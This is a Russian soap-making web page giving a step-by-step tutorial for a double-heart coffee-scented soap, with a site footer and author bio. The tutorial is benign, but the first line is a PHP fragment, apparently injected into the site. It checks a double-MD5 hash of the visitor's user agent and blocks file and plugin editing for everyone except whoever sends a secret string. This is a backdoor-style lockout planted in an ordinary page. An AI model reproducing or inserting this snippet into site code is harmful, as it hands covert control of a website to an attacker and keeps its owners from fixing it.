if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем своими руками двойное мыло. Сердце в сердце | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем своими руками двойное мыло. Сердце в сердце

После создания кофейного мыла у меня осталась лишняя мыльная масса, так как неправильно рассчитала количество формочек. Выбрасывать было жалко, и я разлила остатки в маленькие формочки для льда, и таким образом сделала много маленьких мыльных сердечек

После созда­ния кофей­но­го мыла у меня оста­лась лиш­няя мыль­ная мас­са, так как непра­виль­но рас­счи­та­ла коли­че­ство фор­мо­чек. Выбра­сы­вать было жал­ко, и я раз­ли­ла остат­ки в малень­кие фор­моч­ки для льда, и таким обра­зом сде­ла­ла мно­го малень­ких мыль­ных сердечек.

Так как ими не совсем удоб­но поль­зо­вать­ся я реши­ла сде­лать серд­ца поболь­ше в цен­тре кото­рых поме­сти­ла кофей­ные. Полу­чи­лось не толь­ко кра­си­во и полез­но, но и роман­тич­но. Пред­ла­гаю вам свой мастер класс, по кото­ро­му мож­но изго­то­вить мыло сво­и­ми рука­ми в фор­ме двой­но­го сердца.

Ингре­ди­ен­ты:

  •  70 грамм белой мыль­ной основы
  •  Аро­ма­ти­за­тор со вку­сом кофе
  •  Емкость, в кото­рой буде­те пла­вить основу
  •  Эма­ли­ро­ван­ная кастрю­ля (для водя­ной бани)
  •  Фор­моч­ка – серд­це (мож­но конеч­но и любую другую)
  •  Спирт или спе­ци­аль­ная жид­кость, кото­рая предот­вра­ща­ет появ­ле­ние пузырь­ков на мыле

Под­го­то­вив все из пере­чис­лен­но­го спис­ка, мож­но пере­хо­дить к вар­ке мыла в домаш­них усло­ви­ях, исполь­зуя дан­ную ста­тью как поша­го­вую инструк­цию по мыло­ва­ре­нию для начинающих. 

Шаг 1.

Для нача­ла мыль­ную осно­ву необ­хо­ди­мо сде­лать жид­кой, для чего поме­сти­те емкость с пред­ва­ри­тель­но наре­зан­ной на мел­кие кусоч­ки осно­вой в мик­ро­вол­нов­ку либо на водя­ную баню. Пере­ме­ши­вать не обя­за­тель­но, но нуж­но сле­дить что­бы мас­са не закипала.

Я рас­тап­ли­ва­ла осно­ву в стек­лян­ной бан­ке на водя­ной бане.

1

Шаг 2.

Пока идет про­цесс плав­ле­ния зай­мем­ся сле­ду­ю­щи­ми ингре­ди­ен­та­ми. Возь­ми­те аро­ма­ти­за­тор с запа­хом кофе и кап­ни­те 3 кап­ли в ста­кан. Брать дру­гую отдуш­ку не реко­мен­ду­ет­ся, так как запа­хи могут сме­шать­ся и от кофе совсем не оста­нет­ся аромата.

2

Шаг 3.

Рас­топ­лен­ную мыль­ную осно­ву выли­ва­ем из бан­ки в ста­кан­чик с аро­ма­ти­за­то­ром и хоро­шень­ко пере­ме­ши­ва­ем. Далее сбрыз­ни­те спир­том фор­моч­ку, что­бы обез­жи­рить ее поверх­ность, и поло­жи­те в нее малень­кое кофей­ное сер­деч­ко. Сно­ва обезжирьте.

3

Шаг 4.

Оста­лось толь­ко залить белую осно­ву в фор­моч­ку, но толь­ко очень акку­рат­но, что­бы не обра­зо­ва­лось пустых мест. Я поль­зу­юсь сили­ко­но­вы­ми фор­моч­ка­ми, из них про­ще вытас­ки­вать гото­вое мыло.

4

Вновь сбрыз­ни­те спир­том (либо спе­ци­аль­ным аэро­зо­лем) мыло, что­бы его поверх­ность оста­лась глад­кой и не пузырилась.

После того как мыло схва­тить­ся кор­кой, мож­но пере­ме­стить его в моро­зил­ку для того, что­бы оно быст­рее застыло.

Шаг 5.

Выни­ма­ем мыло, и раду­ем­ся резуль­та­ту! Теперь и вы може­те при­го­то­вить мыло в домаш­них усло­ви­ях! После того, как вы сде­ла­ли свой пер­вый шедевр, вы може­те поиг­рать с цве­то­вой гам­мой, корич­не­вое кофей­ное сер­деч­ко хоро­шо соче­та­ет­ся прак­ти­че­ски с любым цветом.

5 6


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!